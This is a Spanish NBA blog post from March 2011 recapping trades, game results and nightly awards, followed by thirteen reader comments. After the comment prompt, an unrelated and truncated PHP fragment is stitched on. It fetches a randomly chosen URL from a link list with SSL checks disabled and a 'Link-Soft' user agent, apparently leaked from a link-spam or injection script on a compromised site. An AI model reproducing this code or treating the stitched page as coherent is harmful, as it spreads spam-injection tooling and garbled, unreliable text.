La Crónica (01/03/2011)

02 de March de 2011 por TheDeerHunter

Alguien podía pensar que todo acababa en el deadline del período de traspasos. Nada más lejos de la realidad. Ayer los Celtics firmaban a Troy Murphy, que había quedado libre tras haber hecho efectivo su buyout con los Warriors. Es un fichaje interesante, que tenía como pretendientes a un buen número de pretendientes al anillo. Se antoja algo redundante en los Celtics y parece incluso mayor acierto el haber evitado que lo cierren otros que el haberlo hecho ellos mismos. Por su parte los Heat cortaban a Carlitos Arroyo, del que se habla podría terminar en los Spurs. Con Bibby por ahí suelto, blanco y en botella, leche. Los Wizards le han pillado el gusto a soltar jugadores y parece que también cortarán a Thornton. Menuda lástima. Terminando con este capítulo los Thunder han ejercido una extensión de contrato con Kedrick Perkins de 35 millones por cuatro años. Podéis empezar a valorar si os parece mucho o poco.

Volviendo a la competición los Spurs echaron demasiado en falta a Parker y cuajaron un partido lamentable en Memphis (93-109). Podíamos esperar que con la baja se resintiera el ataque pero no que se les olvidara defender de repente. Mavs y Lakers aprovecharon para recortar distancias. Los primeros en Philadelphia, con triple doble de Kidd y Terry tocando la guitarra (101-93). Los amarillos hicieron lo propio en Minneapolis en un partido feo de consideración en el que tuvieron que volver a tirar de defensa para sacarlo (90-79). Continuamos en el Oeste con la particular remontada de los Rockets, que lograron una importantísima victoria en Portland (103-87) y con el hundimiento de los Hornets, destrozados por los Raptors de Calderón (90-96), y de los Warriors que se volvieron con derrota de Indianapolis (100-109).

El mejor duelo de la noche fue el Nueva York@Orlando. Dado el nivel de sus compañeros Howard vuelve a sonar en las quinielas para el MVP. Ayer volvió a cuajar un partido mastodóntico ante el big three montado en el equipo de D’Antoni. Stat, Melo y Billups se inflaron a meter puntos y el resto rascó poca bola. Eso sí, los 2 rebotes de Stat frente a los 17 de su par le dejan con el culo al aire. La ayuda de Nelson y Anderson, más la inesperada aparición de Quentin Richardson, permitieron a los locales llevarse el gato al agua (110-116).

Para terminar destacar la nueva derrota de los Pistons en Milwaukee (90-92). Lo noticioso no es que pierdan los de la Motown, sino volver a ver a Rip Hamilton vestido de azul. Con la triste temporada que están cuajando ambos equipos, aún tienen opciones de reengancharse a la lucha por la postemporada. Un poco lamentable.

PREMIOS

MVP: Nos alegra muchísimo otorgar de manera totalmente justificada el premio a Jose Calderón que se ha marcado un auténtico partidazo frente Chris Paul. El extremeño ha anotado 22 puntos (7-10), ha capturado 7 rebotes y ha repartido 16 asistencias. De esta manera ha superado otras sobresaliente actuaciones como los 30 puntos y 16 rebotes de Dwight Howard o el triple doble (13-10-13) del incombustible Jason Kidd.

Rookie: Una vez más aparece Wesley Johnson por aquí, en esta ocasión gracias a sus 20 puntos y 8 rebotes. Nunca es tarde si la dicha es buena.

Sorpresa: Anoche el mejor de los Warriors no fue Curry, ni Ellis, ni Lee, ni siquiera Wright. Fue Reggie Williams que con 24 puntos y un 10 de 14 en tiros de campo disfrutó de uno de esos buenos partidos que le salen de vez en cuando.

Decepción: No hay nada como celebrar tu vuelta a las canchas tras una agria polémica que con 4 aciertos de 17 lanzamientos. Llega el momento de comprobar lo profesional que es Richard Hamilton.

Esfuerzo en vano: Todos los focos en NY están sobre Carmelo pero haberse hecho con Chauncey Billups también es realmente interesante. El ex de Denver fue anoche el mejor de su equipo en la derrota frente Orlando con 30 puntos, 6 rebotes, 6 asistencias y 3 robos. De momento su rendimiento es superior al de su compañero de traspaso.

Comenta

13 comentarios a esta entrada

  1. Txusma dice:
    #1

    Viendo la cara de Murphy está claro que había nacido para jugar en los Celtics. Blanquito y rubio… Lo raro es que no lo ficharan antes.

      Citar

  2. Hynreck dice:
    #2

    Pues con lo de Murphy no entiendo demasiado la adquisición de Jeff Green, aunque claro, éste ha sido a posteriori, y como dice Deer, si se presenta la oportunidad…

    PÇor otro lado 35 kilos en 4 años, es decir, casi 9 kilos por temporada para Perkins a mí me parece un poco caro, ya que solo aporta defensa. Me vienen a la mente contratazos hecho a jugadores de éste tipo y antes de un año arrepentirse y sudar tinta para deshacerse de sus contratos, Dampier, Big Ben, Diop…

      Citar

  3. -=TheKing=- dice:
    #3

    Yo cuento con que los O’neal no van a estar sanos para post temporada así que tres jugadores interiores, Murphy, Garnett y Davis, contando que los dos primeros se ganan la vida dirando de 4 metros pues….. no sé pero tengo dudas de los Celtics, se plantean unos play offs en los que no tengo ni idea de lo qué va a pasar

      Citar

  4. AndiD dice:
    #4

    A mi el fichaje de T.Murphy me parece muy bueno para las elminatorias del Este. Tanto D.Howard, B.Bass como los interiores de los Heat (si es que hay alguno) tienen problemas para defender a 5 metros de la canasta (o incluso el triple en el caso de T.Murphy).
    Pero para una hipotética final con Lakers no lo veo nada claro. Odom y Gasol no tienen tantos problemas saliendo a defender a 5 metros.
    Ya veremos cómo resulta, pero a mi me parece que hay demasiados interiores en Celtics.

      Citar

  5. TheDeerHunter dice:
    #5

    Juer… no sé si es porque CP3 y los Hornets están de puñetera pena, pero me sorprende mucho la velocidad de Calderón en los resúmenes de ayer.
    Espectacular… pero si de verdad está tan fuerte no entiendo cómo este tipo de actuaciones (aunque fueran algo menores) no se dan más con más frecuencia.

    Por cierto, a mí los 9 kilos por año para Perkins me parecen demasiada tralla.

      Citar

  6. GreenPride dice:
    #6

    Para mí gran labor de Danny Ainge en el mercado de traspasos. Murphy abrirá el campo con su tiro y es un gran reboteador por lo que ayudará mucho a los verdes. No contemos a Green como interior pues está claro que va a jugar de 3 en Boston supliendo a Pierce. En cuanto a los O’Neal tengo mis dudas con Jermaine pero no con Shaq. Jugará los playoffs seguro. Si además los Celtics firman a Corey Brewer, tendrán mejor equipo que antes del trade deadline de largo. Sé que Perkins era una gran ayuda defensiva pero en ataque era bastante limitado creo que con los cambios Boston mejora bastante ofensivamente. En cuanto a que Pau u Odom no tienen tantos problemas para salir a defender a 5 metros estoy de acuerdo pero menos problemas tenían antes en defender a Perkins que muchas veces se defendía solo. Para mí los Thunder le han dado a Perkins más de su valor real, vamos lo que Ainge no le quiso dar en Boston.
    En cuanto a Bibby para los Heat pues no creo que cambie mucho la situación respecto a Arroyo. Buen lanzador de vez en cuando pero su edad le pasa mucha factura en defensa, no le veo defendiendo a Rondo o Rose en un partido de playoffs la verdad.
    Ayer partidazo Magic-Knicks. El Big 3 de New York le dio la vuelta al primer cuarto bestial de Howard pero luego una gran segunda parte de Nelson y la ayuda de Anderson hicieron remontar a los Magic. Por cierto, “partidazo” de Turkoglu, 0 puntos y expulsado en el 2º cuarto por protestar y de Richardson. Carmelo muy muy chupón con malísimos porcentajes. Los Knicks darán guerra pero no tienen potencial suficiente para avanzar en playoffs a mi entender

      Citar

  7. GreenPride dice:
    #7

    Por cierto me alegro mucho por Calderón y su gran actuación y según veo día de vacaciones para los Spurs. Popovich ya ve la ventaja campo casi conseguida y ninguno de los titulares jugó más de 27 minutos (Manudonna 21, Duncan 26). Suele hacerlo Popovich y creo que será tónica general en los partidos que quedan si se les complican para intentar llegar frescos a playoffs

      Citar

  8. Denise dice:
    #8

    Vaya mandarinas Melo Anthony, así cualquiera mete 25 puntos por noche. De escudero quizás, pero de jugador franquicia no vale.
    Dwight Howard MVP!!

      Citar

  9. HisRoyalAirness dice:
    #9

    Mucho escudero me parece Melo Denise… Todo crack se tira unas cuantas mandarinas de vez en cuando (y no tan de vez en cuando), Rose sin ir màs lejos; yendo más lejos: Kobe, Wade, Dirk y muchos màs. Es inevitable.

      Citar

  10. Sancho88 dice:
    #10

    Coincido con Denise. Howard se merece el mvp más que nadie. En Chicago Rose por lo menos tiene a Boozer, pero lo de Orlando esta temporada es dejarlo todo sobre las espaldas de este grandullón. Muchísimo mérito lo que está consiguiendo, porque después de la marcha de Lewis-Carter ha asumido su papel líder. Está metiendo 5 puntos de media más que la pasada temporada. Es el mejor pivot de la competición sin ninguna duda.

      Citar

  11. Denise dice:
    #11

    Si ya no es por las mandarinas en sí, sino porque no veo que tenga ese espiritu ganador de Kobe, James, Wade, Rose o Durant.
    Qué es caapz de meter 20 por noche, sí, pero no lo veo un lider ganador. Si él es el jugador franquicia y lider de su equipo, dudo que vaya a conseguir algún titulo allá por el equipo donde esté

      Citar

  12. Denise dice:
    #12

    Quería decir 30 por noche, no 20…

      Citar

  13. max dice:
    #13

    Parece que el “boyout” de Brewer se lo han adjudicado los Mavericks. Gran refuerzo al ya de por si banquillo de lujo de Dallas.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>